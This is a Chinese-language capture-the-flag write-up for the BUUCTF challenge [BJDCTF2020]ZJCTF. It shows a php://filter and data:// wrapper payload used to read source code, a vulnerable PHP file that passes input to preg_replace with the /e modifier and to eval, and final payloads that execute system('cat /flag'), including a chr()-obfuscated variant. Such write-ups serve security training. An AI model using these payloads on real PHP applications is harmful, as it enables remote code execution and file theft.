BUU [BJDCTF2020]ZJCTF,不过如此

简介: BUU [BJDCTF2020]ZJCTF,不过如此

BUU [BJDCTF2020]ZJCTF,不过如此

和BUU [ZJCTF 2019]NiZhuanSiWei一样。

?text=data://text/plain,I have a dream
&file=php://filter/read=convert.base64-encode/resource=next.php

得到next.php源码。

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str);
}

foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
  @eval($_GET['cmd']);
}

最终目的是调用getFlag()然后命令执行。

get和session两个值一样的,名字为id的变量,没什么用,估计是用来混淆不知道的那些人。

preg_replace()的/e模式存在命令执行。

深入研究preg_replace与代码执行 - 先知社区 (aliyun.com)

最终payload:

?text=data://text/plain,I have a dream&file=next.php&
+
\S*=${getFlag()}&cmd=system('cat /flag');
\S*=${system(chr(99).chr(97).chr(116).chr(32).chr(47).chr(102).chr(108).chr(97).chr(103))}
//chr拼接system的参数
\S*=${phpinfo()}可查看phpinfo()

目录
相关文章
|
5月前
|
Python
BUUCTF [BJDCTF2020]一叶障目 1
BUUCTF [BJDCTF2020]一叶障目 1
131 0
|
5月前
BUUCTF [BJDCTF2020]藏藏藏 1
BUUCTF [BJDCTF2020]藏藏藏 1
70 0
|
2月前
|
PHP
BUU [BJDCTF2020]The mystery of ip
BUU [BJDCTF2020]The mystery of ip
15 1
|
2月前
[BJDCTF 2020]鸡你太美
[BJDCTF 2020]鸡你太美
24 0
|
2月前
|
数据库
BUU [0CTF 2016]piapiapia
BUU [0CTF 2016]piapiapia
14 0
|
2月前
BUU [ZJCTF 2019]NiZhuanSiWei
BUU [ZJCTF 2019]NiZhuanSiWei
21 0
BUUCTF---[BJDCTF2020]藏藏藏1
BUUCTF---[BJDCTF2020]藏藏藏1
|
5月前
【随想】每日两题Day.2
随想】每日两题Day.2
17 0
|
5月前
|
前端开发 数据安全/隐私保护
BUUCTF [BJDCTF2020]纳尼 1
BUUCTF [BJDCTF2020]纳尼 1
60 0
|
SQL Web App开发 Oracle
Ichunqiu云境 —— Endless(无间计划) Writeup
两个入口点,一个入口点是pboot-cms,另外一个是SQL注入